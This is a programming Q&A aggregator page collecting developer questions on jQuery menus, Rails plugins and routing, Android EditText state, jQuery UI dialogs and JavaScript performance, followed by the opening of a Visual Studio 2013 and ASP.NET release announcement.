        var pos = $this.next().find('a').size();
        var f = function(){
          if (pos == 0) clearTimeout(stacktime);
          $this.next().find('a:nth-child(' + pos + ')').css('visibility', 'visible');
          --pos;
        };
        // each thumb will appear with a delay
        stacktime = setInterval(f, 50);
      });
      // on mouseleave of the whole <li> the scrollable area is hidden
      $('#menu li').bind('mouseleave', function () {
        var $this = $(this);
        clearTimeout(stacktime);
        $this.find('.sc_menu').css('visibility', 'hidden').find('a').css('visibility', 'hidden');
        $this.find('.sc_menu_wrapper').css('visibility', 'hidden');
      });
      // when hovering a thumb, change its opacity
      $('.sc_menu a').hover(
        function () {
          var $this = $(this);
          $this.find('img').stop().animate({'opacity': '1.0'}, 400);
        },
        function () {
          var $this = $(this);
          $this.find('img').stop().animate({'opacity': '0.3'}, 400);
        }
      );
    });

Wondering if some eagle eye might be able to point out where I am going wrong. As my knowledge of jQuery is limited, I'm guessing it is in there. I really appreciate anyone taking the time to look this over. Thank you!
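One concrete bug stands out in the script above: jQuery has no scrollRight() method (only scrollLeft() and scrollTop()), and offset() returns only top and left, so both $wrapper.scrollRight(...) and $wrapper.offset().right come back undefined. A sketch of the mousemove handler rewritten for horizontal scrolling, keeping the question's inactiveMargin value:

```javascript
// Horizontal variant of the tutorial's vertical logic: map the mouse's
// x position inside the wrapper to a scrollLeft offset.
function buildThumbs($elem) {
  var $wrapper = $elem.next();
  var $menu = $wrapper.find('.sc_menu');
  var inactiveMargin = 220;

  $wrapper.scrollLeft(0); // start at the beginning of the strip

  $wrapper.bind('mousemove', function (e) {
    var wrapperWidth = $wrapper.width();
    var menuWidth = $menu.outerWidth() + 2 * inactiveMargin;
    var left = (e.pageX - $wrapper.offset().left) *
               (menuWidth - wrapperWidth) / wrapperWidth - inactiveMargin;
    $wrapper.scrollLeft(left);
  });
}
```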

    Read the article

  • What do I need to change to get this 'acts_as_rateable' Rails plugin working with this code from the

    - by tepidsam
Hello! I'm working my way through the 'Foundation Rails 2' book. In Chapter 9, we are building a little "plugins" app. In the book, he installs the acts_as_rateable plugin found at http://juixe.com/svn/acts_as_rateable. This plugin doesn't appear to exist in 2010 (the page for this "old" plugin seems to be working again... it was down when I tried it earlier), so I found another acts_as_rateable plugin at http://github.com/azabaj/acts_as_rateable. These plugins are different, and I'm trying to get the "new" plugin working with the code/project/app from the Foundation Rails 2 book. I was able to use the migration generator included with the "new" plugin and it worked. Now, though, I'm a bit confused. In the book, he has us create a new controller to work with the plugin (the old plugin). Here's the code for that:

    class RatingsController < ApplicationController
      def create
        @plugin = Plugin.find(params[:plugin_id])
        rating = Rating.new(:rating => params[:rating])
        @plugin.ratings << average_rating
        redirect_to @plugin
      end
    end

Then he had us change the routing:

    map.resources :plugins, :has_many => :ratings
    map.resources :categories
    map.root :controller => 'plugins'

Next, we modified the 'show' template so that it looks like this:

    <div id="rate_plugin">
      <h2>Rate this plugin</h2>
      <ul class="star-rating">
        <li>
          <%= link_to "1", @plugin.rate_it(1), :method => :post, :title => "1 star out of 5", :class => "one-star" %>
        </li>
        <li>
          <%= link_to "2", plugin_ratings_path(@plugin, :rating => 2), :method => :post, :title => "2 stars out of 5", :class => "two-stars" %>
        </li>
        <li>
          <%= link_to "3", plugin_ratings_path(@plugin, :rating => 3), :method => :post, :title => "3 stars out of 5", :class => "three-stars" %>
        </li>
        <li>
          <%= link_to "4", plugin_ratings_path(@plugin, :rating => 4), :method => :post, :title => "4 stars out of 5", :class => "four-stars" %>
        </li>
        <li>
          <%= link_to "5", plugin_ratings_path(@plugin, :rating => 5), :method => :post, :title => "5 stars out of 5", :class => "five-stars" %>
        </li>
      </ul>
    </div>

The problem is that we're using code for a different plugin. When I try to actually "rate" one of the plugins, I get an "unknown attribute" error. That makes sense: I'm using attribute names for the "old" plugin, but I should be using attribute names for the "new" plugin. The problem is... I've tried using a variety of different attribute names and I keep getting the same error. From the README for the "new" plugin, I think I should be using some of these, but I haven't been able to get them working:

    Install the plugin into your vendor/plugins directory, insert 'acts_as_rateable' into your model, then restart your application.

    class Post < ActiveRecord::Base
      acts_as_rateable
    end

    Now your model is extended by the plugin; you can rate it (1-#) or calculate the average rating.

    @plugin.rate_it( 4, current_user.id )
    @plugin.average_rating #=> 4.0
    @plugin.average_rating_round #=> 4
    @plugin.average_rating_percent #=> 80
    @plugin.rated_by?( current_user ) #=> rating || false
    Plugin.find_average_of( 4 ) #=> array of posts

    See acts_as_rateable.rb for further details!

I'm guessing that I might have to make some "bigger" changes to get this plugin working. I'm asking this question to learn and only learn. The book gives code to get things working with the old plugin, but if one were actually building this app today it would be necessary to use this "new" plugin, so I would like to see how it could be used. Cheers! Any ideas on what I could change to get the "new" plugin working?
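Going by the README excerpt quoted above, the github plugin rates through the model itself (rate_it) rather than through a nested ratings association, so the controller from the book might be reworked along these lines; current_user is borrowed from the README and assumed to exist in this app:

```ruby
# Sketch of a create action for the github acts_as_rateable plugin:
# the model exposes rate_it(rating, user_id) instead of Rating records
# pushed onto a ratings collection.
class RatingsController < ApplicationController
  def create
    @plugin = Plugin.find(params[:plugin_id])
    @plugin.rate_it(params[:rating].to_i, current_user.id)
    redirect_to @plugin
  end
end
```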

    Read the article

  • Trouble Upgrading Rails 2 Routes for a Redmine Plugin

    - by user1858628
I am trying to get a Redmine plugin designed for Rails 2 to work with Rails 3: https://github.com/dalyons/redmine-todos-scrum-plugin. I've pretty much fixed most parts, but I'm having no success whatsoever in getting the routes to work. The original routes for Rails 2 are as follows:

    map.resources :todos, :name_prefix => 'project_', :path_prefix => '/projects/:project_id', :member => { :toggle_complete => :post }, :collection => { :sort => :post }
    map.resources :todos, :name_prefix => 'user_', :path_prefix => '/users/:user_id', :controller => :mytodos, :member => { :toggle_complete => :post }, :collection => { :sort => :post }
    map.my_todos 'my/todos', :controller => :mytodos, :action => :index
    map.connect 'projects/:project_id/todos/show/:id', :controller => "todos", :action => "show"

rake routes outputs the following:

    sort_project_todos POST /projects/:project_id/todos/sort(.:format) {:controller=>"todos", :action=>"sort"}
    project_todos GET /projects/:project_id/todos(.:format) {:controller=>"todos", :action=>"index"}
    POST /projects/:project_id/todos(.:format) {:controller=>"todos", :action=>"create"}
    new_project_todo GET /projects/:project_id/todos/new(.:format) {:controller=>"todos", :action=>"new"}
    toggle_complete_project_todo POST /projects/:project_id/todos/:id/toggle_complete(.:format) {:controller=>"todos", :action=>"toggle_complete"}
    edit_project_todo GET /projects/:project_id/todos/:id/edit(.:format) {:controller=>"todos", :action=>"edit"}
    project_todo GET /projects/:project_id/todos/:id(.:format) {:controller=>"todos", :action=>"show"}
    PUT /projects/:project_id/todos/:id(.:format) {:controller=>"todos", :action=>"update"}
    DELETE /projects/:project_id/todos/:id(.:format) {:controller=>"todos", :action=>"destroy"}
    sort_user_todos POST /users/:user_id/todos/sort(.:format) {:controller=>"mytodos", :action=>"sort"}
    user_todos GET /users/:user_id/todos(.:format) {:controller=>"mytodos", :action=>"index"}
    POST /users/:user_id/todos(.:format) {:controller=>"mytodos", :action=>"create"}
    new_user_todo GET /users/:user_id/todos/new(.:format) {:controller=>"mytodos", :action=>"new"}
    toggle_complete_user_todo POST /users/:user_id/todos/:id/toggle_complete(.:format) {:controller=>"mytodos", :action=>"toggle_complete"}
    edit_user_todo GET /users/:user_id/todos/:id/edit(.:format) {:controller=>"mytodos", :action=>"edit"}
    user_todo GET /users/:user_id/todos/:id(.:format) {:controller=>"mytodos", :action=>"show"}
    PUT /users/:user_id/todos/:id(.:format) {:controller=>"mytodos", :action=>"update"}
    DELETE /users/:user_id/todos/:id(.:format) {:controller=>"mytodos", :action=>"destroy"}
    my_todos /my/todos {:controller=>"mytodos", :action=>"index"}
    /projects/:project_id/todos/show/:id {:controller=>"todos", :action=>"show"}

The nearest I have got for Rails 3 is as follows:

    scope '/projects/:project_id', :name_prefix => 'project_' do
      resources :todos, :controller => 'todos' do
        member do
          post :toggle_complete
        end
        collection do
          post :sort
        end
      end
    end

    scope '/users/:user_id', :name_prefix => 'user_' do
      resources :todos, :controller => 'mytodos' do
        member do
          post :toggle_complete
        end
        collection do
          post :sort
        end
      end
    end

    match 'my/todos' => 'mytodos#index', :as => :my_todos
    match 'projects/:project_id/todos/show/:id' => 'todos#show'

rake routes outputs the following:

    toggle_complete_todo POST /projects/:project_id/todos/:id/toggle_complete(.:format) todos#toggle_complete {:name_prefix=>"project_"}
    sort_todos POST /projects/:project_id/todos/sort(.:format) todos#sort {:name_prefix=>"project_"}
    todos GET /projects/:project_id/todos(.:format) todos#index {:name_prefix=>"project_"}
    POST /projects/:project_id/todos(.:format) todos#create {:name_prefix=>"project_"}
    new_todo GET /projects/:project_id/todos/new(.:format) todos#new {:name_prefix=>"project_"}
    edit_todo GET /projects/:project_id/todos/:id/edit(.:format) todos#edit {:name_prefix=>"project_"}
    todo GET /projects/:project_id/todos/:id(.:format) todos#show {:name_prefix=>"project_"}
    PUT /projects/:project_id/todos/:id(.:format) todos#update {:name_prefix=>"project_"}
    DELETE /projects/:project_id/todos/:id(.:format) todos#destroy {:name_prefix=>"project_"}
    POST /users/:user_id/todos/:id/toggle_complete(.:format) mytodos#toggle_complete {:name_prefix=>"user_"}
    POST /users/:user_id/todos/sort(.:format) mytodos#sort {:name_prefix=>"user_"}
    GET /users/:user_id/todos(.:format) mytodos#index {:name_prefix=>"user_"}
    POST /users/:user_id/todos(.:format) mytodos#create {:name_prefix=>"user_"}
    GET /users/:user_id/todos/new(.:format) mytodos#new {:name_prefix=>"user_"}
    GET /users/:user_id/todos/:id/edit(.:format) mytodos#edit {:name_prefix=>"user_"}
    GET /users/:user_id/todos/:id(.:format) mytodos#show {:name_prefix=>"user_"}
    PUT /users/:user_id/todos/:id(.:format) mytodos#update {:name_prefix=>"user_"}
    DELETE /users/:user_id/todos/:id(.:format) mytodos#destroy {:name_prefix=>"user_"}
    my_todos /my/todos(.:format) mytodos#index
    /projects/:project_id/todos/show/:id(.:format) todos#show

I am guessing that I am not using :name_prefix correctly, resulting in duplicate paths which are then omitted. Any help would be greatly appreciated.
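A plausible reading of the output above: Rails 3's scope does not understand the Rails 2 :name_prefix option, so it falls through into the route defaults (the {:name_prefix=>"project_"} hashes), the generated names collide, and the duplicates are dropped. The Rails 3 equivalent is :as on the scope; a hedged sketch of the conversion:

```ruby
# :as on a scope prefixes the generated route names, restoring
# project_todos, user_todos, toggle_complete_project_todo, etc.
scope '/projects/:project_id', :as => 'project' do
  resources :todos do
    member     { post :toggle_complete }
    collection { post :sort }
  end
end

scope '/users/:user_id', :as => 'user' do
  resources :todos, :controller => 'mytodos' do
    member     { post :toggle_complete }
    collection { post :sort }
  end
end

match 'my/todos' => 'mytodos#index', :as => :my_todos
match 'projects/:project_id/todos/show/:id' => 'todos#show'
```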

    Read the article

  • how to save state of dynamically created editTexts

    - by user922531
    I'm stuck on how to save the state of my EditTexts when the screen orientation changes. Currently, if text is entered into the EditTexts and the screen is rotated, the fields are wiped (as expected). I am already calling onSaveInstanceState and saving a String, but I have no clue how to save the EditTexts which are created in code, and then retrieve the values and put them back into the EditTexts when redrawing the activity. A snippet of my code — my main activity is as follows:

    public void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.main);

        // get the multidim array
        b = getIntent().getBundleExtra("obj");
        m = (Methods) b.getSerializable("Methods");

        // method to draw the layout
        InitialiseUI();

        // Restore UI state from the savedInstanceState.
        if (savedInstanceState != null) {
            String strValue = savedInstanceState.getString("light");
            if (strValue != null) {
                FLight = strValue;
            }
        }

        try {
            mCamera = Camera.open();
            if (FLight.equals("true")) {
                flashLight();
            }
        } catch (Exception e) {
            Log.d(TAG, "Thrown exception onCreate() camera: " + e);
        }
    } // end onCreate

    /** Called when returning to the screen. */
    @Override
    public void onResume() {
        super.onResume();
        try {
            mCamera = Camera.open();
            if (FLight.equals("true")) {
                flashLight();
            }
        } catch (Exception e) {
            Log.d(TAG, "Thrown exception onResume() camera: " + e);
        }
    } // end onResume

    /** Saves data before leaving the screen. */
    @Override
    protected void onSaveInstanceState(Bundle outState) {
        super.onSaveInstanceState(outState);
        outState.putString("light", FLight);
    }

    /** Called when exiting / leaving the screen. */
    @Override
    protected void onPause() {
        super.onPause();
        Log.d(TAG, "onPause()");
        if (mCamera != null) {
            mCamera.stopPreview();
            mCamera.release();
            mCamera = null;
        }
    }

    /*
     * Set up the UI elements and add click listeners to buttons; used in
     * onCreate() and onConfigurationChanged().
     *
     * Sets the EditText fields to show the previous readings as hints.
     */
    public void InitialiseUI() {
        Log.d(TAG, "Start of InitialiseUI, Main activity");

        // get a reference to the TableLayout
        final TableLayout myTLreads = (TableLayout) findViewById(R.id.myTLreads);

        // create empty arrays to hold the TextViews and EditTexts
        final TextView[] myTextViews = new TextView[m.getNoRows()];
        final EditText[] myEditTexts = new EditText[m.getNoRows()];

        for (int i = 0; i < m.getNoRows(); i++) {
            TableRow tr = new TableRow(this);
            tr.setLayoutParams(new LayoutParams(LayoutParams.MATCH_PARENT, LayoutParams.WRAP_CONTENT));

            // create a new TextView / EditText for this row
            final TextView rowTextView = new TextView(this);
            final EditText rowEditText = new EditText(this);

            // setWidth is needed, otherwise my landscape layout is off
            rowEditText.setWidth(400);
            // this stops the keyboard taking up the whole screen in landscape layout
            rowEditText.setImeOptions(EditorInfo.IME_FLAG_NO_EXTRACT_UI);
            // add some padding to the right of the TextView
            rowTextView.setPadding(0, 0, 10, 0);
            // set colors to white
            rowTextView.setTextColor(Color.parseColor("#FFFFFF"));
            rowEditText.setTextColor(Color.parseColor("#FFFFFF"));

            // if readings were already sent today, disable the field and set the hint color to yellow
            if (m.getTransmit(i + 1) == false) {
                rowEditText.setEnabled(false);
                rowEditText.setHintTextColor(Color.parseColor("#FFFF00"));
            }

            // set the text of the TextView to the meter name
            rowTextView.setText(m.getMeterName(i + 1));
            // set the hint of the EditText to the last submitted reading
            rowEditText.setHint(m.getLastReadString(i + 1));

            rowEditText.setInputType(InputType.TYPE_CLASS_PHONE); // InputType.TYPE_NUMBER_FLAG_DECIMAL

            // add the views to the table row, and the row to the table
            tr.addView(rowTextView);
            tr.addView(rowEditText);
            myTLreads.addView(tr);

            // keep a reference to each view
            myTextViews[i] = rowTextView;
            myEditTexts[i] = rowEditText;
        }

        final Button submit = (Button) findViewById(R.id.submitReadings);
        // add a click listener to the button
        try {
            submit.setOnClickListener(new View.OnClickListener() {
                public void onClick(View v) {
                    Log.d(TAG, "Submit button clicked, Main activity");
                    // method to do HTML getting and sending
                    preSubmitCheck(m.getAccNo(), m.getPostCode(), myEditTexts);
                }
            });
        } catch (Exception e) {
            Log.d(TAG, "Exceptions (submit button)" + e.toString());
        }
    } // end of InitialiseUI

    I don't need to do anything with these values until a button is clicked. Would it be easier if they were in a ListView? I'm guessing I would still have the problem of saving them and retrieving them on rotation. If it helps, I have an object m which contains a String[][] that I could temporarily store them in.
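    Not an authoritative fix, but a minimal sketch of one common approach, assuming the myEditTexts array created in InitialiseUI() is promoted to an activity field (private EditText[] myEditTexts;): collect the current values into a string list on save, and re-apply them after InitialiseUI() has rebuilt the rows. The "editTextValues" key is just an illustrative name.

    import java.util.ArrayList;

    // Sketch: assumes myEditTexts is an activity field populated by InitialiseUI().
    @Override
    protected void onSaveInstanceState(Bundle outState) {
        super.onSaveInstanceState(outState);
        outState.putString("light", FLight);
        // Collect the current text of every dynamically created EditText.
        ArrayList<String> values = new ArrayList<String>();
        for (EditText et : myEditTexts) {
            values.add(et.getText().toString());
        }
        outState.putStringArrayList("editTextValues", values);
    }

    // In onCreate(), after InitialiseUI() has rebuilt the rows:
    if (savedInstanceState != null) {
        ArrayList<String> values = savedInstanceState.getStringArrayList("editTextValues");
        if (values != null) {
            for (int i = 0; i < myEditTexts.length && i < values.size(); i++) {
                myEditTexts[i].setText(values.get(i));
            }
        }
    }

    Alternatively, since Android only auto-saves the state of views that have IDs, giving each dynamically created EditText a stable, unique id with rowEditText.setId(...) inside the loop should let the framework restore the text for you without any manual bundling.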

    Read the article

  • Re-opening closed dialog puts it in the start position after moving it

    - by semmelbroesel
    I'm using multiple instances of the jQuery UI dialog along with draggable and resizable. Whenever I drag or resize one of the dialog boxes, the position and dimensions of the current box are saved to a database and then loaded the next time the page opens. This is working well. However, when I close a dialog box and re-open it using a button, jQuery sets the position of the box back to its original location in the center of the screen. Furthermore, I use a show effect to slide the box off to the left on closing and in from the left on re-opening. I found two ways to update its position when the slide-in animation is done; however, it still slides into the center of the screen, and I have yet to find a way to get it to slide in towards the location it is supposed to have. Here are the parts of the code that play a part in this:

    $('.box').dialog({
        closeOnEscape: false,
        hide: { effect: "drop", direction: 'left' },
        beforeClose: function (evt, ui) {
            var $this = $(this);
            SavePos($this); // saves the dimensions to db
        },
        dragStop: function() {
            var $this = $(this);
            SavePos($this);
        },
        resizeStop: function() {
            var $this = $(this);
            SavePos($this);
        },
        open: function() {
            var $this = $(this);
            $this.dialog('option', { show: { effect: "drop", direction: 'left' } });
            if (init) // meaning only load this code when the page has finished initializing
            {
                // tried it both ways - set the position before and after the effect - no success
                UpdatePos($this.attr('id'));
                // I tried this section with promise() and effect / complete - I found no difference
                $this.parent().promise().done(function() {
                    UpdatePos($this.attr('id'));
                });
            }
        }
    });

    function UpdatePos(key) {
        // boxpos is an object holding the position for each box by the box's id
        var $this = $('#' + key);
        //console.log('updating pos for box ' + boxid);
        if ($this && $this.hasClass('ui-dialog-content')) {
            //console.log($this.dialog('widget').css('left'));
            $this.dialog('option', { width: boxpos[key].width, height: boxpos[key].height });
            $this.dialog('widget').css({ left: boxpos[key].left + 'px', top: boxpos[key].top + 'px' });
            //console.log('finished updating pos');
            //console.log($this.dialog('widget').css('left'));
        }
    }

    The button that re-opens the box has this code on it to make that happen:

    var $box = $('#boxid');
    if ($box) {
        if ($box.dialog('isOpen')) {
            $box.dialog('moveToTop');
        } else {
            $box.dialog("open");
        }
    }

    I don't know what jQuery UI does to the box as it hides it (other than display:none) or to make it slide in, so maybe there's something I'm missing here that might help... Basically, I need jQuery to remember the box's position and put the box back into that location when it is re-opened. It took me days to make it this far, but this is one obstacle I have yet to overcome. Maybe there's a different way I can re-open the box? Thanks!

    EDIT: Forgot - this issue ONLY happens when I use my UpdatePos function to set the location of a box (i.e. on page load). When I drag a box with my mouse, close it, and re-open it, everything works. So I'm guessing there's one more storage location for the box's position that I'm missing here...
    EDIT2: After more messing with it, my code for debugging now looks like this:

    open: function() {
        var $this = $(this);
        console.log('box open');
        console.log($this.dialog('widget').position()); // { top=0, left=-78.5 }
        console.log($this.dialog('widget').css('left'));
        $this.dialog('option', { show: { effect: "drop", direction: 'left' } });
        if (init) {
            UpdatePos($this.attr('id'));
            $this.parent().promise().done(function() {
                console.log($this.dialog('widget').position()); // { top=313, left=641.5 }
                console.log($this.dialog('widget').css('left'));
                UpdatePos($this.attr('id'));
                console.log($this.dialog('widget').position()); // { top=121, left=107 }
                console.log($this.dialog('widget').css('left'));
            });
        }
    }

    The results I'm getting are:

    box open
    Object { top=0, left=-78.5 }
    -78.5px
    Object { top=313, left=641.5 }
    641.5px
    Object { top=121, left=107 }
    107px

    So it looks to me as if the widget is being moved off screen (left=-78.5), then moved for the animation, and then my code moves it into the location it should be in (121/107). The position() results for $box.position() or $box.dialog().position() do not change during this debugging section. Maybe this will help someone here - I'm still out of ideas... I also just discovered that when I drag the item around myself, then close and re-open it, it is very unpredictable. Sometimes it will end up in the correct location horizontally, but not vertically. Sometimes it will end up back in the center of the screen...
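    One approach worth trying (a sketch only, assuming a reasonably recent jQuery UI and the boxpos object already populated as in UpdatePos above; openBoxAt is a hypothetical helper, not from the question): set the dialog's position option before calling open(), so the drop-in animation targets the saved coordinates instead of the default center, rather than moving the widget after the fact.

    // Sketch: apply the saved coordinates *before* open(), so the drop-in
    // animation slides toward the stored location instead of the center.
    function openBoxAt(key) {
        var $box = $('#' + key);
        if (!$box.length) { return; }
        if ($box.dialog('isOpen')) {
            $box.dialog('moveToTop');
            return;
        }
        var pos = boxpos[key]; // saved {left, top, width, height} from the db
        $box.dialog('option', {
            width: pos.width,
            height: pos.height,
            // jQuery UI position syntax: offset from the window's top-left corner
            position: { my: 'left top', at: 'left+' + pos.left + ' top+' + pos.top, of: window }
        });
        $box.dialog('open');
    }

    The idea is that jQuery UI computes the animation's end point from the position option at open time, so setting it up front should avoid the visible jump to the center.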

    Read the article

  • Accessing local variable doesn't improve performance

    - by NicMagnier
    The short version

    Why is this code:

    var index = (Math.floor(y / scale) * img.width + Math.floor(x / scale)) * 4;

    more performant than this one?

    var index = Math.floor(ref_index) * 4;

    The long version

    This week, the author of Impact js published an article about some rendering issue: http://www.phoboslab.org/log/2012/09/drawing-pixels-is-hard In the article there was the source of a function to scale an image by accessing pixels in the canvas. I wanted to suggest some traditional ways to optimize this kind of code so that the scaling would be shorter at loading time. But after testing it, my result was most of the time worse than the original function. Guessing this was the JavaScript engine doing some smart optimization, I tried to understand a bit more what was going on, so I did a bunch of tests. But my results are quite confusing and I need some help to understand what's going on. I have a test page here: http://www.mx981.com/stuff/resize_bench/test.html jsPerf: http://jsperf.com/local-variable-due-to-the-scope-lookup To start the test, click the picture and the results will appear in the console. There are three different versions:

    The original code:

    for( var y = 0; y < heightScaled; y++ ) {
        for( var x = 0; x < widthScaled; x++ ) {
            var index = (Math.floor(y / scale) * img.width + Math.floor(x / scale)) * 4;
            var indexScaled = (y * widthScaled + x) * 4;
            scaledPixels.data[ indexScaled ] = origPixels.data[ index ];
            scaledPixels.data[ indexScaled+1 ] = origPixels.data[ index+1 ];
            scaledPixels.data[ indexScaled+2 ] = origPixels.data[ index+2 ];
            scaledPixels.data[ indexScaled+3 ] = origPixels.data[ index+3 ];
        }
    }

    jsPerf: http://jsperf.com/so-accessing-local-variable-doesn-t-improve-performance

    One of my attempts to optimize it:

    var ref_index = 0;
    var ref_indexScaled = 0;
    var ref_step = 1 / scale;
    for( var y = 0; y < heightScaled; y++ ) {
        for( var x = 0; x < widthScaled; x++ ) {
            var index = Math.floor(ref_index) * 4;
            scaledPixels.data[ ref_indexScaled++ ] = origPixels.data[ index ];
            scaledPixels.data[ ref_indexScaled++ ] = origPixels.data[ index+1 ];
            scaledPixels.data[ ref_indexScaled++ ] = origPixels.data[ index+2 ];
            scaledPixels.data[ ref_indexScaled++ ] = origPixels.data[ index+3 ];
            ref_index += ref_step;
        }
    }

    jsPerf: http://jsperf.com/so-accessing-local-variable-doesn-t-improve-performance

    The same optimized code, but recalculating the index variable each time (Hybrid):

    var ref_index = 0;
    var ref_indexScaled = 0;
    var ref_step = 1 / scale;
    for( var y = 0; y < heightScaled; y++ ) {
        for( var x = 0; x < widthScaled; x++ ) {
            var index = (Math.floor(y / scale) * img.width + Math.floor(x / scale)) * 4;
            scaledPixels.data[ ref_indexScaled++ ] = origPixels.data[ index ];
            scaledPixels.data[ ref_indexScaled++ ] = origPixels.data[ index+1 ];
            scaledPixels.data[ ref_indexScaled++ ] = origPixels.data[ index+2 ];
            scaledPixels.data[ ref_indexScaled++ ] = origPixels.data[ index+3 ];
            ref_index += ref_step;
        }
    }

    jsPerf: http://jsperf.com/so-accessing-local-variable-doesn-t-improve-performance

    The only difference between the last two is the calculation of the 'index' variable. And to my surprise, the optimized version is slower in most browsers (except Opera).
    Results of personal testing (not the jsPerf tests):

    Opera:   Original: 8668ms   Optimized: 932ms   Hybrid: 8696ms
    Chrome:  Original: 139ms    Optimized: 145ms   Hybrid: 136ms
    Safari:  Original: 433ms    Optimized: 853ms   Hybrid: 451ms
    Firefox: Original: 343ms    Optimized: 422ms   Hybrid: 350ms

    After digging around, it seems the usual good practice is to access mainly local variables, because of scope lookup. Because the optimized version reads only one local variable, it should be faster than the hybrid code, which reads multiple variables and objects in addition to the various operations involved. So why is the "optimized" version slower? I thought it might be because some JavaScript engines don't optimize the optimized version because it is not hot enough, but after using --trace-opt in Chrome, it seems all versions are properly compiled by V8. At this point I am a bit clueless and wonder if somebody knows what is going on. I also did some more test cases on this page: http://www.mx981.com/stuff/resize_bench/index.html
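    For anyone reproducing numbers like these, a minimal timing harness (a sketch; it assumes a browser with performance.now(), and resizeOriginal / resizeOptimized / resizeHybrid are hypothetical wrappers around the three loops above) that warms the JIT before measuring helps rule out compilation cost:

    // Sketch: time each variant after a few warm-up runs, so the JIT has
    // already compiled the hot loop before measurement starts.
    function timeIt(label, fn, runs) {
        for (var i = 0; i < 5; i++) { fn(); }   // warm-up
        var start = performance.now();
        for (var j = 0; j < runs; j++) { fn(); }
        var avg = (performance.now() - start) / runs;
        console.log(label + ': ' + avg.toFixed(1) + ' ms per run');
    }

    timeIt('original',  resizeOriginal,  20);
    timeIt('optimized', resizeOptimized, 20);
    timeIt('hybrid',    resizeHybrid,    20);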

    Read the article

  • Announcing the Release of Visual Studio 2013 and Great Improvements to ASP.NET and Entity Framework

    - by ScottGu
    Today we released VS 2013 and .NET 4.5.1. These releases include a ton of great improvements, and include some fantastic enhancements to ASP.NET and the Entity Framework. You can download and start using them now. Below are details on a few of the great ASP.NET, Web Development, and Entity Framework improvements you can take advantage of with this release. Please visit http://www.asp.net/vnext for additional release notes, documentation, and tutorials.

    One ASP.NET

    With the release of Visual Studio 2013, we have taken a step towards unifying the experience of using the different ASP.NET sub-frameworks (Web Forms, MVC, Web API, SignalR, etc), and you can now easily mix and match the different ASP.NET technologies you want to use within a single application. When you do a File->New Project with VS 2013 you'll now see a single ASP.NET Project option. Selecting this project will bring up an additional dialog that allows you to start with a base project template, and then optionally add/remove the technologies you want to use in it. For example, you could start with a Web Forms template and add Web API support to it, or create an MVC project and also enable Web Forms pages within it. This makes it easy for you to use any ASP.NET technology you want within your apps, and take advantage of any feature across the entire ASP.NET technology span.

    Richer Authentication Support

    The new "One ASP.NET" project dialog also includes a new Change Authentication button that, when pushed, enables you to easily change the authentication approach used by your applications – and makes it much easier to build secure applications that enable SSO from a variety of identity providers. For example, when you start with the ASP.NET Web Forms or MVC templates you can easily add any of the following authentication options to the application:
    * No Authentication
    * Individual User Accounts (single sign-on support with Facebook, Twitter, Google, and Microsoft ID – or forms auth with ASP.NET Membership)
    * Organizational Accounts (single sign-on support with Windows Azure Active Directory)
    * Windows Authentication (Active Directory in an intranet application)

    The Windows Azure Active Directory support is particularly cool. Last month we updated Windows Azure Active Directory so that developers can now easily create any number of directories using it (for free and deployed within seconds). It now takes only a few moments to enable single-sign-on support within your ASP.NET applications against these Windows Azure Active Directories: simply choose the "Organizational Accounts" radio button within the Change Authentication dialog and enter the name of your Windows Azure Active Directory. This will automatically configure your ASP.NET application to use Windows Azure Active Directory and register the application with it. Now when you run the app your users can easily and securely sign in using their Active Directory credentials – regardless of where the application is hosted on the Internet. For more information about the new process for creating web projects, see Creating ASP.NET Web Projects in Visual Studio 2013.

    Responsive Project Templates with Bootstrap

    The new default project templates for ASP.NET Web Forms, MVC, Web API and SPA are built using Bootstrap. Bootstrap is an open source CSS framework that helps you build responsive websites which look great on different form factors such as mobile phones, tablets and desktops.
    For example, in a full browser window the home page created by the MVC template lays its content out horizontally. When you resize the browser to a narrow window to see how it would look on a phone, the contents gracefully wrap around and the horizontal top menu turns into an icon. When you click the menu icon, it expands into a vertical menu – which enables a good navigation experience for devices with little screen real estate. We think Bootstrap will enable developers to build web applications that work even better on phones, tablets and other mobile devices – and enable you to easily build applications that can leverage the rich ecosystem of Bootstrap CSS templates already out there. You can learn more about Bootstrap here.

    Visual Studio Web Tooling Improvements

    Visual Studio 2013 includes a new, much richer, HTML editor for Razor files and HTML files in web applications. The new HTML editor provides a single unified schema based on HTML5. It has automatic brace completion, jQuery UI and AngularJS attribute IntelliSense, attribute IntelliSense grouping, and other great improvements. For example, typing "ng-" on an HTML element will show the IntelliSense for AngularJS. This support for AngularJS, Knockout.js, Handlebars and other SPA technologies in this release of ASP.NET and VS 2013 makes it even easier to build rich client web applications. The HTML editor can also now inspect your page at design-time to determine all of the CSS classes that are available; for a page using Bootstrap, the auto-completion list contains classes from Bootstrap's CSS file. No more guessing at which Bootstrap element names you need to use. Visual Studio 2013 also comes with built-in support for both CoffeeScript and LESS editing. The LESS editor comes with all the cool features from the CSS editor and has specific IntelliSense for variables and mixins across all the LESS documents in the @import chain.

    Browser Link – SignalR channel between browser and Visual Studio

    The new Browser Link feature in VS 2013 lets you run your app within multiple browsers on your dev machine, connect them to Visual Studio, and simultaneously refresh all of them just by clicking a button in the toolbar. You can connect multiple browsers (including IE, Firefox, Chrome) to your development site, including mobile emulators, and click refresh to refresh all the browsers at the same time. This makes it much easier to develop and test against multiple browsers in parallel. Browser Link also exposes an API that enables developers to write Browser Link extensions. By taking advantage of the Browser Link API, it becomes possible to create very advanced scenarios that cross the boundaries between Visual Studio and any browser that's connected to it. Web Essentials takes advantage of the API to create an integrated experience between Visual Studio and the browser's developer tools, remote-controlling mobile emulators, and a lot more. You will see us take advantage of this support even more to enable really cool scenarios going forward.

    ASP.NET Scaffolding

    ASP.NET Scaffolding is a new code generation framework for ASP.NET web applications. It makes it easy to add boilerplate code to your project that interacts with a data model. In previous versions of Visual Studio, scaffolding was limited to ASP.NET MVC projects. With Visual Studio 2013, you can now use scaffolding for any ASP.NET project, including Web Forms.
    When using scaffolding, we ensure that all required dependencies are automatically installed for you in the project. For example, if you start with an ASP.NET Web Forms project and then use scaffolding to add a Web API controller, the required NuGet packages and references to enable Web API are added to your project automatically. To do this, just choose the Add->New Scaffold Item context menu. Support for scaffolding async controllers uses the new async features from Entity Framework 6.

    ASP.NET Identity

